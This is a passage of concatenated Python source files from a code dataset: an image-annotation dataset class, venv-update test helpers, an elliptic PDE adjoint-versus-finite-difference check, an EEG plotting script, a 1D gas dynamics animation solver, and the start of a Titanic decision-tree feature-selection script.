dataset consisting \n of images and annotations. \n\n An object of this class will provide the following functionality:\n\n Attributes:\n 1) The path to the dataset, images and annotations.\n 2) A sorted list of image file names\n 3) A sorted list of annotation/ building label file names\n 4) The length of the dataset.\n\n Methods:\n 1) Getting the size of each image in the dataset (assumed to be the same for all images)\n 2) Getting an image and its associated building labels given an index\n 3) Getting a batch of images and assoicated building labels given a start index and batch size\n 4) Removing a set of images and assoicated building labels given a set of indices.\n 5) Visualizing a single image in images_path with its assoicated building labels\n 6) Visualizing a sequence of tiles (images) in images_path with associated building labels, given\n a start and end index.\n 7) Visualizing the entire area with all bounding boxes (assuming such an image exists in the\n raw_data directory of the data_path)\n\n \"\"\"\n\n def __init__(self, data_path):\n \"\"\"\n Initializes a dataset object using the data in data_path. \n \"\"\"\n\n # The path to the entire data, the images and the annotations. Attributes 1)\n self.data_path = data_path\n self.images_path = f'{data_path}/images'\n self.annotations_path = f'{data_path}/annotations'\n \n # Attribute 2)\n self.img_list = sorted(os.listdir(self.images_path), key = self.sort_key)\n\n # Attritbute 3)\n self.annotation_list = sorted(os.listdir(self.annotations_path), key = self.sort_key)\n\n # Attribute 4)\n self.length = len(self.img_list)\n\n def sort_key(self, file_name):\n \"\"\"\n Helper method only.\n Finds the integer present in the string file_name. If an integer cannot be found,\n returns the file_name itself. Used as key function in sorting list of file names.\n \"\"\"\n d = re.search('[0-9]+', file_name)\n return int(file_name[d.start():d.end()]) if d else file_name\n\n def get_img_size(self):\n \"\"\"\n Method 1)\n Gets the size of the images in the dataset (assumed to be uniform)\n \"\"\"\n # Gets first image in dataset\n im = Image.open(f'{self.images_path}/{self.img_list[0]}')\n # Returns the shape of the image\n return np.array(im).shape\n \n def get_tile_and_label(self, index):\n \"\"\"\n Method 2)\n Gets the tile and label associated with data index.\n\n Returns:\n (tile_array, dictionary_of_buildings)\n \"\"\"\n\n # Open the jpeg image and save as numpy array\n im = Image.open(f'{self.images_path}/{self.img_list[index]}')\n im_arr = np.array(im)\n\n # Open the json file and parse into dictionary of index -> buildings pairs\n buildings_in_tile = {}\n with open(f'{self.annotations_path}/{self.annotation_list[index]}', 'r') as filename:\n try: \n buildings_in_tile = json.load(filename)\n except ValueError:\n buildings_in_tile = {}\n \n return (im_arr, buildings_in_tile)\n \n \n def get_batch(self, start_index, batch_size):\n \"\"\"\n Method 3)\n Gets batch of tiles and labels associated with data start_index.\n\n Returns:\n [(tile_array, list_of_buildings), ...]\n \"\"\"\n batch = []\n for i in range(start_index, start_index + batch_size):\n batch.append(self.get_tile_and_label(i))\n \n return batch\n\n def remove_tiles(self, indices_to_remove):\n \"\"\"\n Method 4)\n Removes the tiles associated with the indices in indices_to_remove, and renames all files\n in self.images_path and self.annotations.path (as appropriate)\n\n Requires: indices_to_remove is a set\n \"\"\"\n\n # file_index keeps track of the correct index for the images in the directory \n file_index = 0\n for i in range(self.length):\n\n # Check if index is to be removed\n if i in indices_to_remove:\n os.remove(f'{self.images_path}/img_{i}.jpg')\n os.remove(f'{self.annotations_path}/annotation_{i}.json')\n else:\n\n # If not to be removed, then check if index of file is in line with new file_index\n if i != file_index:\n os.rename(f'{self.images_path}/img_{i}.jpg', f'{self.images_path}/img_{file_index}.jpg')\n os.rename(f'{self.annotations_path}/annotation_{i}.json', \\\n f'{self.annotations_path}/annotation_{file_index}.json')\n \n file_index += 1\n\n # Update attributes 1)\n self.img_list = sorted(os.listdir(self.images_path), key = self.sort_key)\n self.annotation_list = sorted(os.listdir(self.annotations_path), key = self.sort_key)\n self.length = len(self.img_list)\n\n def visualize_tile(self, index):\n \"\"\"\n Method 5)\n Provides a visualization of the tile with the tile and its corresponding annotation/ label. \n \"\"\"\n im = Image.open(f'{self.images_path}/{self.img_list[index]}')\n im_arr = np.array(im)\n mng = plt.get_current_fig_manager()\n mng.window.showMaximized()\n plt.imshow(im_arr)\n\n # Open the json file and parse into dictionary of index -> buildings pairs\n buildings_in_tile = {}\n with open(f'{self.annotations_path}/{self.annotation_list[index]}', 'r') as filename:\n try: \n buildings_in_tile = json.load(filename)\n except ValueError:\n buildings_in_tile = {}\n\n for building_coords in buildings_in_tile.values():\n poly = Polygon(building_coords)\n x, y = poly.exterior.xy\n plt.plot(x, y)\n\n # TODO: Visualize bounding boxes from json format.\n\n plt.show()\n \n \n def visualize_tiles(self, start_idx, end_idx):\n \"\"\"\n Method 6)\n Provides a visualization of a sequence of tiles with associated annotations/labels\n between the start index and the end index (not including end index) of the tiles.\n \"\"\"\n for i in range(start_idx, end_idx):\n print(\"Tile index: \" + str(i))\n self.visualize_tile(i)\n \n\n def visualize_dataset(self):\n \"\"\"\n Method 7)\n Provides visualization of entire dataset image area, \n including annotations.\n\n This uses the data stored in the RAW_DATA_PATH.\n Requires:\n The entire image area with OSM data to be stored in a directory called raw_data.\n The OSM data should be in a pickle file, and the entire image area should be in \n a jpeg file.\n \"\"\"\n bboxes = []\n # Open pickle file with osm data\n with open(f\"{self.data_path}/raw_data/annotations.pkl\", \"rb\") as filename:\n bboxes = pickle.load(filename)\n\n im = Image.open(f\"{self.data_path}/raw_data/Entire_Area.jpg\")\n im_arr = np.array(im)\n\n plt.imshow(im_arr)\n for building_coords in bboxes:\n poly = Polygon(building_coords)\n x, y = poly.exterior.xy\n plt.plot(x, y)\n \n # # Add the grid\n # ax.grid(which='major', axis='both', linestyle='-')\n # ax.show()\n plt.grid()\n # plt.xticks(np.arange(0, 6000, 228), range(0, 23))\n # plt.yticks(np.arange(0, 6000, 228), range(0, 23))\n plt.show()\n","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218628313","text":"# NOTE WELL: No side-effects are allowed in __init__ files. This means you!\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom re import compile as Regex\nfrom re import MULTILINE\n\nfrom py._path.local import LocalPath as Path\n\nTOP = Path(__file__) / '../../..'\n\n\ndef requirements(reqs, path='requirements.txt'):\n \"\"\"Write a requirements.txt file to the current working directory.\"\"\"\n Path(path).write(reqs)\n\n\ndef run(*cmd, **env):\n if env:\n from os import environ\n tmp = env\n env = environ.copy()\n env.update(tmp)\n else:\n env = None\n\n from .capture_subprocess import capture_subprocess\n from venv_update import info, colorize\n info('\\nTEST> ' + colorize(cmd))\n out, err = capture_subprocess(cmd, env=env)\n err = strip_coverage_warnings(err)\n return out, err\n\n\ndef venv_update(*args, **env):\n # we get coverage for free via the (patched) pytest-cov plugin\n return run(\n 'venv-update',\n *args,\n **env\n )\n\n\ndef venv_update_symlink_pwd():\n # I wish I didn't need this =/\n # surely there's a better way -.-\n # NOTE: `pip install TOP` causes an infinite copyfiles loop, under tox >.<\n from venv_update import __file__ as venv_update_path, dotpy\n\n # symlink so that we get coverage, where possible\n venv_update_path = Path(dotpy(venv_update_path))\n local_vu = Path(venv_update_path.basename)\n if local_vu.exists():\n local_vu.remove()\n local_vu.mksymlinkto(venv_update_path)\n\n\ndef venv_update_script(pyscript, venv='venv'):\n \"\"\"Run a python script that imports venv_update\"\"\"\n\n # symlink so that we get coverage, where possible\n venv_update_symlink_pwd()\n\n # write it to a file so we get more-reasonable stack traces\n testscript = Path('testscript.py')\n testscript.write(pyscript)\n return run('%s/bin/python' % venv, testscript.strpath)\n\n\n# coverage.py adds some helpful warnings to stderr, with no way to quiet them.\ncoverage_warnings_regex = Regex(\n r'^Coverage.py warning: (%s)\\n' % '|'.join((\n r'Module .* was never imported\\.',\n r'No data was collected\\.',\n r'Module venv_update was previously imported, but not measured\\.',\n )),\n flags=MULTILINE,\n)\n\n\ndef strip_coverage_warnings(stderr):\n return coverage_warnings_regex.sub('', stderr)\n\n\ndef strip_pip_warnings(stderr):\n return stderr.replace(\n ''.join((\n 'DEPRECATION: Python 2.6 is no longer supported by the Python core team, please upgrade your Python. ',\n 'A future version of pip will drop support for Python 2.6\\n',\n )),\n '',\n )\n\n\ndef uncolor(text):\n # the colored_tty, uncolored_pipe tests cover this pretty well.\n from re import sub\n text = sub('\\033\\\\[[^A-z]*[A-z]', '', text)\n return sub('[^\\n\\r]*\\r', '', text)\n\n\ndef pip_freeze(venv='venv'):\n from os.path import join\n out, err = run(join(venv, 'bin', 'pip'), 'freeze', '--local')\n\n # Most python distributions which have argparse in the stdlib fail to\n # expose it to setuptools as an installed package (it seems all but ubuntu\n # do this). This results in argparse sometimes being installed locally,\n # sometimes not, even for a specific version of python.\n # We normalize by never looking at argparse =/\n import re\n out = re.sub(r'argparse==[\\d.]+\\n', '', out, count=1)\n\n assert err == ''\n return out\n\n\ndef enable_coverage(tmpdir, venv='venv', options=()):\n venv = tmpdir.join(venv)\n options += ('--', '-r', str(TOP.join('requirements.d/coverage.txt')))\n venv_update(str(venv), *options)\n\n return venv\n\n\nclass OtherPython(object):\n \"\"\"represents a python interpreter that doesn't match the \"current\" interpreter's version\"\"\"\n\n def __init__(self):\n import sys\n if sys.version_info[0] <= 2:\n self.interpreter = 'python3.4'\n self.version_prefix = '3.4.'\n else:\n self.interpreter = 'python2.7'\n self.version_prefix = '2.7.'\n","sub_path":"tests/testing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"18400877","text":"\"\"\"\nTest solutions of Elliptic PDE in the DILI paper by Cui et~al (2016)\nShiwei Lan @ U of Warwick, 2016\n\"\"\"\n\n\nfrom dolfin import *\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\nfrom Elliptic import Elliptic\n\n# parameters[\"num_threads\"] = 2\n\nnp.random.seed(2016)\n# settings\ndim=9\n# choice of coefficient definition\nkl_opt='fb'\n# kl_opt='kf'\n\n# generate observations\n# theta=.1*np.ones(dim)\ntheta=.1*np.random.randn(dim)\nelliptic=Elliptic(nx=30,ny=30)\n# K-L expansion with specific choice\ncoeff=elliptic.coefficient(theta=theta,kl_opt=kl_opt,degree=2)\n\n# solve forward equation\n# u_fwd,p_fwd,l_fwd=elliptic.soln_fwd(theta)\n\n# obtain observations\nobs,idx,loc,sd_noise=elliptic.get_obs(coeff)\n\n# parameters[\"plotting_backend\"]=\"matplotlib\"\n# plt.figure(0)\n# fig=plot(elliptic.states_fwd.split(True)[0])\n# plt.colorbar(fig)\n\n# define data misfit class\nprint('\\nDefining data-misfit...')\nmisfit=elliptic.data_misfit(obs,1./sd_noise**2,idx,loc)\n\n# ------------ early test ---------------------#\n# elliptic.set_forms(coeff)\n# u0,_=elliptic.soln_fwd()\n# u1,_=elliptic.states_fwd.split(True)\n# u2=u1.vector()\n#\n# print('Data-misfit: % .10f' % misfit.eval(u0))\n# print('Data-misfit: % .10f' % misfit.eval(u1))\n# print('Data-misfit: % .10f' % misfit.eval(u2))\n#\n# # test misfit as functional for adjoint\n# J_form = misfit.form(u0)\n# J_assemb = assemble(J_form)\n# print('Assembled data-misfit form: % .10f' % J_assemb)\n# J_func = misfit.func(u0)\n# J_value = sum([J_func(list(p)) for p in loc])\n# print('Evaluated data-misfit function: % .10f' % J_value)\n#\n# # solve adjoint equation\n# elliptic.set_forms(coeff,ord=[0,1])\n# u_adj,l_adj=elliptic.soln_adj(misfit)\n# elliptic.plot(backend='vtk')\n#\n# # obtain gradient of data-misfit\n# g = elliptic.get_grad(misfit)\n# print(g)\n#\n# # solve 2nd forward equation\n# u_actedon = np.random.randn(len(theta))\n# # u_fwd2,p_fwd2,l_fwd2=elliptic.soln_fwd2(u_actedon)\n#\n# # solve 2nd adjoint equation\n# # u_adj,p_adj2,l_adj2=elliptic.soln_adj2()\n#\n# # obtain metric action\n# Ma = elliptic.get_metact(u_actedon)\n# print (Ma)\n\n\n# ------------ adjoint method ---------------------#\n\n# obtain the geometric quantities\nprint('\\n\\nObtaining geometric quantities with Adjoint method...')\nstart = time.time()\nnll,dnll,Fv,FI = elliptic.get_geom(coeff,misfit,[0,1,1.5,2])\nif dnll is not None:\n print('gradient:')\n print(dnll)\nv = np.random.randn(coeff.l)\nif Fv is not None:\n Ma = Fv(v)\n print('metric action on a random vector:')\n print(Ma)\nif FI is not None:\n print('metric:')\n print(FI)\n# plot\n# elliptic.plot()\nend = time.time()\nprint('Time used is %.4f' % (end-start))\n\n# save solutions to file\n# elliptic.save()\n# plot solutions\n# elliptic.plot()\n\n# ------------ finite difference ---------------------#\n\n# check with finite difference\nprint('\\n\\nTesting against Finite Difference method...')\nstart = time.time()\nh = 1e-6\ntheta1 = theta.copy(True);\n\n## gradient\nprint('\\nFirst gradient:')\ndnll_fd = np.zeros_like(dnll)\nfor i in range(len(theta)):\n theta1[i]+=h; coeff.theta=theta1\n nll_p,_,_,_ = elliptic.get_geom(coeff,misfit)\n theta1[i]-=2*h; coeff.theta=theta1\n nll_m,_,_,_ = elliptic.get_geom(coeff,misfit)\n dnll_fd[i] = (nll_p-nll_m)/(2*h)\n theta1[i]+=h;\nprint('gradient:')\nprint(dnll_fd)\ndiff_grad = dnll_fd-dnll\nprint('Difference in gradient between adjoint and finite difference: %.10f (inf-norm) and %.10f (2-norm)' % (np.linalg.norm(diff_grad,np.inf),np.linalg.norm(diff_grad)))\n\n## metric-action\nprint('\\nThen Metric-action:')\nMa_fd = np.zeros_like(Ma)\n# obtain sensitivities\nfor n in range(len(idx)):\n misfit_n=elliptic.data_misfit(obs[n],1./sd_noise**2,idx[n],loc[None,n,])\n dudtheta=np.zeros_like(theta)\n for i in range(len(theta)):\n theta1[i]+=h; coeff.theta=theta1\n elliptic.set_forms(coeff)\n u_p,_ = elliptic.soln_fwd()\n u_p_vec = misfit_n.extr_sol_vec(u_p)\n theta1[i]-=2*h; coeff.theta=theta1\n elliptic.set_forms(coeff)\n u_m,_ = elliptic.soln_fwd()\n u_m_vec = misfit_n.extr_sol_vec(u_m)\n dudtheta[i]=(u_p_vec-u_m_vec)/(2*h)\n theta1[i]+=h;\n Ma_fd += dudtheta*(dudtheta.dot(v))\nMa_fd *= misfit.prec\nprint('metric action on a random vector:')\nprint(Ma_fd)\ndiff_Ma = Ma_fd-Ma\nprint('Difference in metric-action between adjoint and finite difference: %.10f (inf-norm) and %.10f (2-norm)' % (np.linalg.norm(diff_Ma,np.inf),np.linalg.norm(diff_Ma)))\nend = time.time()\nprint('Time used is %.4f' % (end-start))\n","sub_path":"RANS/dimension-reduced-geom-infmcmc/elliptic_dili/_Elliptic_KLcoeff/test_adjoint_fd.py","file_name":"test_adjoint_fd.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"536318411","text":"################################################################\n# PROYECTO - IE1014 - INTRODUCCION AL RECONOCIMIENTO PATRONES\n#\n################################################################\n###########\n# IMPORTS\n###########\n\nimport numpy as np\n#from numpy import genfromtxt\n#import sys\n#import os\nimport matplotlib.pyplot as plt\n#from scipy import signal\n\nfrom numpy.fft import fft, fftfreq, ifft\n\n########\n# MAIN\n########\ndef main():\n # sensores y etiquetas\n v1,v2,v3,v4,v5,v6,v7,v8,v9 = [],[],[],[],[],[],[],[],[]\n v10,v11,v12,v13,v14,label = [],[],[],[],[],[]\n # tiempo\n k = 0\n const = 117/14977\n time = []\n # archivo con los datos en el tiempo\n f = open(\"EEG-Eye-State.arff\", \"r\")\n\n lul = []\n # ignorar cosas del arff\n for x in range(19):\n f.readline()\n # se lee el archivo\n for line in f:\n lul.append(k)\n line = line.split(\",\")\n if(float(line[0])<6000 and float(line[1])<6000 and float(line[2])<6000\n and float(line[3])<6000 and float(line[4])<6000 and float(line[5])<6000\n and float(line[6])<6000 and float(line[7])<6000 and float(line[8])<6000\n and float(line[9])<6000 and float(line[10])<6000 and float(line[11])<6000\n and float(line[12])<6000 and float(line[13])<6000 and float(line[14])<6000):\n v1.append(float(line[0]))\n v2.append(float(line[1]))\n v3.append(float(line[2]))\n v4.append(float(line[3]))\n v5.append(float(line[4]))\n v6.append(float(line[5]))\n v7.append(float(line[6]))\n v8.append(float(line[7]))\n v9.append(float(line[8]))\n v10.append(float(line[9]))\n v11.append(float(line[10]))\n v12.append(float(line[11]))\n v13.append(float(line[12]))\n v14.append(float(line[13]))\n label.append(float(line[14])*1000+4000)\n time.append(k*const)\n k = k + 1\n f.close()\n\n\n plt.figure(2)\n plt.plot(time,label,time,v1,time,v2,time,v3,time,v4,time,v5,\n time,v6,time,v7,time,v8,time,v9,time,v10,\n time,v11,time,v12,time,v13,time,v14)\n\n plt.show()\n\n \"\"\"\n fourier = np.fft.fft(v3)\n freq = np.fft.fftfreq(14980)\n\n plt.figure(3)\n plt.plot(freq,fourier.real)\n\n plt.show()\n\n\n #t = np.linspace(0,117,14980)\n\n\n\n\n #signal = 1*np.cos(2*np.pi*0.1*t)\n\n #plt.plot(t,signal)\n #plt.plot(t,t)\n #plt.show()\n\n # FIN\n\n freqs = fftfreq(14980)\n\n mask = freqs > 0\n\n ola = v1\n\n print(ola)\n\n fft_vals = fft(ola)\n\n fft_theo = 2*np.abs(fft_vals/14980)\n\n plt.figure(1)\n plt.plot(freqs[mask], fft_theo[mask])\n plt.plot(freqs, fft_theo)\n plt.show()\n \"\"\"\n return 0\n\n#############\n# EJECUCION\n#############\nif __name__ == \"__main__\":\n main()\n","sub_path":"Proyecto/FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51133138","text":"\r\nfrom matplotlib.pyplot import *\r\nfrom numpy import *\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.animation as animation\r\n\r\n# Mass fraction of each atomic species. We assume we know them\r\nX = 0.7\t\t\t\t# Proton\r\nY_3 = 10**(-10)\t\t# Helium-3\r\nY = 0.29\t\t\t# Helium-4\r\nZ = 0.01\t\t\t# Other metals\r\nZ_7Li = 10**(-13)\t# Lithium-7\r\nZ_7Be = 10**(-13)\t# Beryllium-7\r\nmu = 1/(2*X + Y_3 + 3*(Y-Y_3)/4.0 + 4*Z_7Li/7.0 + 5*Z_7Be/8.0)\t# Mean molecular weight\r\n\r\n# Solar constants\r\nrho_bar_sun = 1.408*10**(3)\t# Average solar density [kg/m^3]\r\n\r\n# Other constants\r\nk_B = 1.382*10**(-23)\t# Boltzmann constant [m^2kg/(s^2K)]\r\n\r\n# Particle/atom Masses\r\nm_u = 1.6605*10**(-27)\t# Atomic mass\r\n\r\n# Initial parameters\r\nrho_0 = 1.42*10**(-7)*rho_bar_sun\t# Initial density\r\nT_0 = 5770\t\t\t# Initial temperature. Units in Kelvin [K]\r\n\r\n# Constants for ideal gas\r\ngamma = 5.0/3.0\r\n\r\ndef P_gas(rho,T):\r\n\t\"\"\" Pressure from gas. Equation from ideal gas law \"\"\"\r\n\tP_G = (rho/(mu*m_u))*k_B*T\r\n\treturn P_G\r\n\r\ndef density(P,T):\r\n\t\"\"\" Function evaluating the density from ideal gas law \"\"\"\r\n\trho = (P*mu*m_u)/(k_B*T)\r\n\treturn rho\r\n\r\ndef c_s(T):\r\n\t\"\"\" Sound speed, ideal gas \"\"\"\r\n\tsound_speed = sqrt(gamma*(k_B*T)/(mu*m_u))\r\n\treturn sound_speed\r\n\r\nclass animate_and_solve:\r\n\tdef __init__(self, N, method):\r\n\t\tself.CHECK = 0\r\n\t\tself.N = N\r\n\t\tself.L = 1.5*10**6\r\n\t\tself.x = linspace(0, self.L, self.N)\r\n\t\tself.dx = self.L/self.N \t# Step length\r\n\t\tself.timeframe = 0 \t\t\t# Time frame for plotting purposes\r\n\r\n\t\t# Empty arrays\r\n\t\tself.P = zeros(self.N)\t\t# Array for pressure\r\n\t\tself.rho = zeros(self.N)\t# Array for density\r\n\t\tself.u_x = zeros(self.N)\t# Array for velocity\r\n\t\tself.T = zeros(self.N)\t\t# Array for temperature\r\n\t\tself.E = zeros(self.N)\t\t# Array Internal energy\r\n\r\n\t\t# Plots the variable we are interested in\r\n\t\tself.method = method\r\n\r\n\r\n\t\t## Small perturbation for testing purposes\r\n\t\t\"\"\"\r\n\t\tsigma = 2e9\r\n\t\tb = self.L/2.0\r\n\t\tf = P_gas(rho_0, T_0)*exp(-(self.x-b)**2/(2.0*sigma))\r\n\t\tself.P[:] = P_gas(rho_0, T_0) + f\r\n\t\tself.rho[:] = density(self.P[:], T_0)\r\n\t\tself.u_x[:] = c_s(T_0)\r\n\t\t\"\"\"\r\n\r\n\t\t# Initial conditions\r\n\t\tself.rho[0:50] = 1*rho_0\r\n\t\tself.rho[50:100] = 10*rho_0\r\n\t\tself.P[:] = P_gas(self.rho, T_0)\r\n\t\tself.T[:] = T_0\r\n\t\tself.E = self.P/(gamma-1.0)\r\n\t\t\r\n\r\n\tdef solve_equations(self):\r\n\t\t\"\"\" Solves the equations for one time step \"\"\"\r\n\t\t# Temporary arrays\r\n\t\trhon = zeros(self.N)\r\n\t\tPn = zeros(self.N)\r\n\t\tu_xn = zeros(self.N)\r\n\r\n\t\trhon = self.rho.copy()\r\n\t\tPn = self.P.copy()\r\n\t\tu_xn = self.u_x.copy()\r\n\t\t\r\n\t\t# Calculates continuity and momentum equations\r\n\t\trho_dt = -self.rho*self.c_dif(u_xn) - self.u_x*self.upwind(rhon)\r\n\t\trhou_dt = -self.rho*self.u_x*self.upwind(u_xn) - self.u_x*self.upwind(rhon*u_xn) - self.c_dif(Pn)\r\n\r\n\t\t# Calculate dt and new values\r\n\t\tself.dt = 0.1*(0.3*self.dx/c_s(T_0))\r\n\t\tself.rho = rhon + self.dt*rho_dt\r\n\t\tself.u_x = (rhon*u_xn + self.dt*rhou_dt)/(self.rho)\r\n\t\tself.P = k_B*T_0*self.rho/(mu*m_u)\t\r\n\r\n\tdef mass_check(self):\r\n\t\t\"\"\"\r\n\t\tA function used to plot the mass as a function of time\r\n\t\tChecks mass conservation\r\n\t\t\"\"\"\r\n\t\tNtime = 300\r\n\t\tt = zeros(Ntime)\r\n\t\tM = zeros(Ntime)\r\n\t\tM[0] = sum(self.rho)\r\n\r\n\t\tfor k in range(Ntime-1):\r\n\t\t\tself.solve_equations()\r\n\t\t\tt[k+1] = t[k]+self.dt\r\n\t\t\tM[k+1] = sum(self.rho)\r\n\r\n\t\tplot(t, M)\r\n\t\txlabel('t - [s]')\r\n\t\tylabel('M - [kg/m$^3$]')\r\n\t\ttitle('Plot of mass as a function of time')\r\n\t\tshow()\r\n\r\n\tdef c_dif(self, A):\r\n\t\t\"\"\"\r\n\t\t# First order central difference\r\n\t\t# Includes boundary conditions\r\n\t\t\"\"\"\r\n\t\tB = zeros(self.N)\r\n\t\tB[0] = A[1] - A[-1]\r\n\t\tB[1:-1] = A[2:] - A[:-2]\r\n\t\tB[-1] = A[0] - A[-2]\r\n\t\treturn B/(2.0*self.dx)\r\n\r\n\tdef upwind(self, A):\r\n\t\t\"\"\"\r\n\t\tFirst order upwind scheme\r\n\t\tAlso includes periodic boundary conditions\r\n\t\t\"\"\"\r\n\t\ta_plus = self.u_x[:] > 0\r\n\t\ta_min = self.u_x[:] <= 0\r\n\t\tB = zeros(self.N)\r\n\t\tB[1:-1] = (a_plus[1:-1]*(A[1:-1] - A[:-2]) + a_min[1:-1]*(A[2:] - A[1:-1]))\r\n\t\tB[0] = a_plus[0]*(A[1] - A[-1]) + a_min[0]*(A[1] - A[-1])\r\n\t\tB[-1] = a_min[-1]*(A[0] - A[-2]) + a_plus[-1]*(A[0] - A[-2])\r\n\t\treturn B/self.dx\r\n\r\n\tdef plot_animation(self):\r\n\t\t\"\"\" Animates the time evolution of the selected variable \"\"\"\r\n\t\tfig, ax = subplots()\r\n\t\t\r\n\t\tif self.method == 'P':\r\n\t\t\t\"\"\" Animates pressure as a function of position \"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01,max(self.P)*1.03,'')\r\n\t\t\tax.set_ylim([min(self.P)*0.8, max(self.P)*1.1])\r\n\t\t\tself.varfunc = lambda: self.P\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.P)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel('P - [Pa]')\r\n\t\t\ttitle('Plot of pressure $P$, N = %d' %self.N)\r\n\r\n\t\telif self.method == 'u':\r\n\t\t\t\"\"\" Animates velocity as a function of position\"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01, max(self.u_x)*0.3,'')\r\n\t\t\tax.set_ylim([min(self.u_x)*0.0, max(self.u_x)*5])\r\n\t\t\tself.varfunc = lambda: self.u_x\r\n\t\t\ttitle('Plot of velocity $u_x$, N = %d' %self.N)\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.u_x)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel(r'$u_x$ - [m/s]')\r\n\r\n\t\telif self.method == 'rho':\r\n\t\t\t\"\"\" Animates density as a function of position \"\"\"\r\n\r\n\t\t\tself.time_text = ax.text(0.01,max(self.rho)*1.03,'')\r\n\t\t\tax.set_ylim([min(self.rho)*0.8, max(self.rho)*1.1])\r\n\t\t\tself.varfunc = lambda: self.rho\r\n\t\t\ttitle(r'Plot of density $\\rho$, N = %d' %self.N)\r\n\t\t\tself.line, = ax.plot(self.x/10.0**6, self.rho)\r\n\t\t\txlabel('x - [Mm]')\r\n\t\t\tylabel(r'$\\rho$ - [kg/m$^3$]')\r\n\r\n\t\telse:\r\n\t\t\traise ValueError('Method not typed in correctly. Try: u, P or rho')\r\n\r\n\t\tdef init():\r\n\t\t\tself.time_text.set_text('')\r\n\r\n\t\t\treturn self.line, self.time_text,\r\n\r\n\t\tani = animation.FuncAnimation(fig, self.update, init_func=init, frames=1\t, interval=50, blit=True)\r\n\r\n\t\t# Saving animation as a file. Comment out show() and remove \"\"\" comments below.\r\n\t\t\"\"\"\r\n\t\trcParams['animation.ffmpeg_path'] = '/FFMPEG/bin/ffmpeg'\r\n\t\tFFwriter = animation.FFMpegWriter()\r\n\t\tani.save('animation.mp4', writer = FFwriter, fps=30, extra_args=['-vcodec', 'libx264'])\r\n\t\t\"\"\"\r\n\t\tshow()\r\n\r\n\r\n\tdef update(self, i):\r\n\t\t\"\"\" Update variables and animation \"\"\"\r\n\t\tself.timeframe += 1\r\n\t\tself.solve_equations()\r\n\t\tself.time_text.set_text('t = %g s' %(self.dt*self.timeframe))\r\n\t\tself.line.set_ydata(self.varfunc())\r\n\t\treturn self.line, self.time_text,\r\n\r\nsolver = animate_and_solve(100, 'P')\r\nsolver.plot_animation()\r\n#solver.mass_check()\r\n","sub_path":"Alex_proj4_1D_different_method.py","file_name":"Alex_proj4_1D_different_method.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"633845862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 19:24:58 2017\n\n@author: minjiang\n使用决策树对泰坦尼克号乘客是否生还进行预测\n并使用特征筛选来寻找最佳的特征组合\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn import feature_selection\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import cross_val_score\n\n#读入数据\ntitanic = pd.read_csv('http://biostat.mc.vanderbilt.edu/wiki/pub/Main/DataSets/titanic.txt')\n#查看数据的统计特征,可以发现数据存在缺失\n#titanic.info()\n\n#分离数据特征与预测目标\nX = titanic.drop(['row.names', 'name', 'survived'], axis = 1)\ny = titanic['survived']\n\n#对缺失数据进行填充\n#X.info()\n#使用平均数补充年龄\nX['age'].fillna(X['age'].mean(), inplace=True)\n#其他缺失数据用“UNKNOW”填充\nX.fillna('UNKNOWN', inplace=True)\n\n#对原始数据进行分割,25%用于测试\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=33)\n\n#对类别特征进行转换,成为特征向量\nvec = DictVectorizer(sparse=False)\nX_train=vec.fit_transform(X_train.to_dict(orient='record'))\nX_test=vec.transform(X_test.to_dict(orient='record'))\n\n#输出处理后特征向量的维度\nprint(len(vec.feature_names_))\n\n#使用所有的特征\ndtc = DecisionTreeClassifier()\ndtc.fit(X_train, y_train)\ndtc_y_pred = dtc.predict(X_test)\nprint(dtc.score(X_test, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n\n#筛选前20%的特征,使用相同配置的决策树模型\nfs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=20)\nX_train_fs = fs.fit_transform(X_train, y_train)\ndtc.fit(X_train_fs, y_train)\nX_test_fs = fs.transform(X_test)\ndtc_y_pred = dtc.predict(X_test_fs)\nprint(dtc.score(X_test_fs, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n\n#通过交叉验证的方法,按照固定间隔的百分比筛选特征\npercentiles = range(1, 100, 2)\nresults = []\n\nfor i in percentiles:\n fs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=i)\n X_train_fs = fs.fit_transform(X_train, y_train)\n scores = cross_val_score(dtc, X_train_fs, y_train, cv=5)\n results.append(scores.mean())\nprint (results)\n\n#找到体现最佳性能的特征筛选的百分比\nopt = results.index(max(results))\nprint('Optimal numbel of features %d' %percentiles[opt])\n\nplt.plot(percentiles, results)\nplt.xlabel('percentiles of features')\nplt.ylabel('accuarcy')\nplt.show()\n\n#使用最佳筛选后的特征(7%),利用相同配置的决策树模型\nfs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=7)\nX_train_fs = fs.fit_transform(X_train, y_train)\ndtc.fit(X_train_fs, 